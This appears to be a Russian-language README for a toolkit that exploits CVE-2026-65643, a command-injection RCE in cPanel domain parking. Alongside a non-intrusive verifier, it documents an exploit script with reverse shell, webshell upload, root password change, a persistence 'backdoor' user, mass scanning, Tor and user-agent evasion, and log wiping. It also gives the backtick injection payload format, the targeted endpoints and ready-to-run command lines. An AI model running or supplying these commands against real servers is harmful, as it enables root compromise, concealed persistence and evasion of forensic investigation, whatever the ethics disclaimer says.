
Red/Blue team набор инструментов для CVE-2026-65643, RCE-уязвимости в парковке доменов cPanel. Включает эксплойт с reverse shell, веб-шелл, закрепление (persistence) и массовое сканирование, а также неинтрузивный верификатор для обнаружения и аудита.

⚠️ ТОЛЬКО ДЛЯ ЭТИЧЕСКОГО ИСПОЛЬЗОВАНИЯ – АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ БЕЗОПАСНОСТИ
Этот репозиторий предоставляет инструменты только для авторизованных специалистов по безопасности, blue teams и пентестеров.
Несанкционированный доступ к компьютерным системам является незаконным в соответствии с CFAA (США), Computer Misuse Act (Великобритания), TCK 243/244 (Турция) и аналогичными законами по всему миру.
CVE‑2026‑65643 — критическая уязвимость внедрения команд в cPanel & WHM версий 11.x, которая позволяет аутентифицированному пользователю cPanel выполнять произвольные системные команды с привилегиями root через функциональность парковки доменов.
`).| Инструмент | Назначение | Целевой пользователь |
|---|---|---|
exploit.py | Полнофункциональный набор инструментов с reverse shell, веб-шеллом, персистентностью, чтением/записью файлов, сменой root-пароля, массовым сканированием, поддержкой Tor и функциями OPSEC. |
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt
requests
urllib3
exploit.pyverifier.pyЭксплойт использует следующие конечные точки и методы внедрения cPanel:
# Формат payload для внедрения
test.com`<команда>`
# Пример
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`
Это программное обеспечение предоставляется только для образовательных целей и авторизованного тестирования безопасности.
| Red teams / авторизованные пентестеры |
verifier.py | Неинтрузивный проверщик уязвимостей, который определяет версию cPanel, проверяет внедрение и оценивает риск без выполнения вредоносных payload-ов. Генерирует подробные отчёты. | Blue teams / аудиторы безопасности |
| Функция | exploit.py | verifier.py |
|---|
| Обнаружение уязвимости | ✅ | ✅ |
| Определение версии (4 конечные точки) | ✅ | ✅ |
| Внедрение команд | ✅ | ❌ |
| Reverse shell | ✅ | ❌ |
| Загрузка WebShell | ✅ | ❌ |
| Персистентность (создание пользователя cPanel) | ✅ | ❌ |
| Смена root-пароля | ✅ | ❌ |
| Чтение/запись файлов | ✅ | ❌ |
| 4 метода внедрения (JSON/Form/CGI/API2) | ✅ | ✅ |
| Поддержка Tor (анонимность) | ✅ | ❌ |
| Ротация User-Agent (OPSEC) | ✅ | ❌ |
| Jitter (OPSEC) | ✅ | ❌ |
| Массовое сканирование (многопоточность) | ✅ | ❌ |
| Интерактивный shell | ✅ | ❌ |
| Неинтрузивный (безопасный) режим | ❌ | ✅ |
| Журналирование по времени | ✅ | ✅ |
| HTML-отчёт | ✅ | ❌ |
| JSON-отчёт | ✅ | ✅ |
| Очистка журналов (анти-форензика) | ✅ | ✅ |
| Поддержка прокси | ✅ | ✅ |
| Пользовательский User-Agent | ✅ | ✅ |
| Управление проверкой SSL | ✅ | ✅ |
| Сценарий | Рекомендуемый инструмент |
|---|
| Blue Team – проверка, уязвима ли ваша установка cPanel | verifier.py |
| Аудит безопасности – неинтрузивная оценка уязвимостей | verifier.py |
| Red Team – авторизованное пентестирование с полной эксплуатацией | exploit.py |
| Bug Bounty – тестирование с ответственным раскрытием | verifier.py |
| Массовое сканирование – проверка нескольких целей на уязвимость | exploit.py (только обнаружение) |
| Реагирование на инциденты – проверка, скомпрометированы ли системы | verifier.py |
| Параметр | Описание |
|---|
-t, --target | Целевой URL cPanel (например, https://cpanel.example.com:2083) |
-l, --target-file | Файл со списком целей (по одной на строку) для массового сканирования |
-u, --username | Имя пользователя cPanel |
-P, --password | Пароль cPanel |
-p, --port | Переопределить порт cPanel (по умолчанию из URL или 2083) |
--threads | Количество потоков для нескольких целей (по умолчанию: 10) |
-o, --output | Сохранить JSON-отчёт в файл |
--html-report | Сохранить HTML-отчёт в файл |
-v, --verbose | Подробный вывод |
--proxy | HTTP/HTTPS прокси (например, http://127.0.0.1:8080) |
--tor | Маршрутизация через Tor (localhost:9050) |
-ua, --user-agent | Пользовательский User-Agent |
--no-keep-alive | Не поддерживать сессию активной |
--delay | Задержка между запросами (по умолчанию: 2.0с) |
--jitter | Случайный jitter (0‑1 сек) между запросами (по умолчанию: 0.5) |
--max-retries | Максимальное количество повторов (по умолчанию: 5) |
--ssl-verify | Проверять SSL-сертификаты |
--timeout | Таймаут запроса (по умолчанию: 15с) |
--cmd | Выполнить одну команду на цели |
--reverse-shell | Reverse shell IP:PORT |
--passwd | Сменить root-пароль |
--adduser | Создать пользователя cPanel (USER DOMAIN PASSWORD) |
--read | Прочитать файл |
--write | Записать файл (указать путь) |
--write-content | Содержимое для записи |
--cleanup | Очистить журналы и историю после эксплуатации |
-i, --interactive | Интерактивный shell после эксплуатации |
--domain-suffix | Суффикс для припаркованного домена (по умолчанию: exploit.local) |
| Параметр | Описание |
|---|
-t, --target | Целевой URL cPanel (например, https://cpanel.example.com:2083) |
-u, --username | Имя пользователя cPanel |
-P, --password | Пароль cPanel |
-o, --output | Сохранить JSON-отчёт в файл |
-v, --verbose | Подробный вывод |
--proxy | HTTP/HTTPS прокси (например, http://127.0.0.1:8080) |
--tor | Маршрутизация через Tor (localhost:9050) |
--ssl-verify | Проверять SSL-сертификаты |
--timeout | Таймаут запроса (по умолчанию: 15с) |
--cleanup | Очистить журналы после теста |
| # | Сценарий | Команда |
|---|
| 1 | Быстрая проверка уязвимости | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass |
| 2 | Детальное сканирование с отчётом | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v |
| 3 | Reverse shell | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | Выполнение команды | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami" |
| 5 | Чтение конфиденциального файла | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | Смена root-пароля | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | Создание нового пользователя cPanel (персистентность) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | Интерактивный shell после эксплуатации | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | Массовое сканирование из файла | python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json |
| 10 | Использование прокси, Tor и пользовательского User-Agent | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0" |
| 11 | Очистка журналов после эксплуатации | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup |
| Метод | Конечная точка | Описание |
|---|
| JSON API | /cpsessXXXXX/json-api/domain | Основной метод внедрения через JSON-payload |
| Form Data | /cpsessXXXXX/json-api/domain | Альтернативное внедрение через данные в формате form |
| CGI Script | /cgi-sys/domainpark.cgi | Внедрение через устаревшую конечную точку CGI |
| API2 | /cpsessXXXXX/json-api/cpanel | Устаревший метод внедрения через API2 |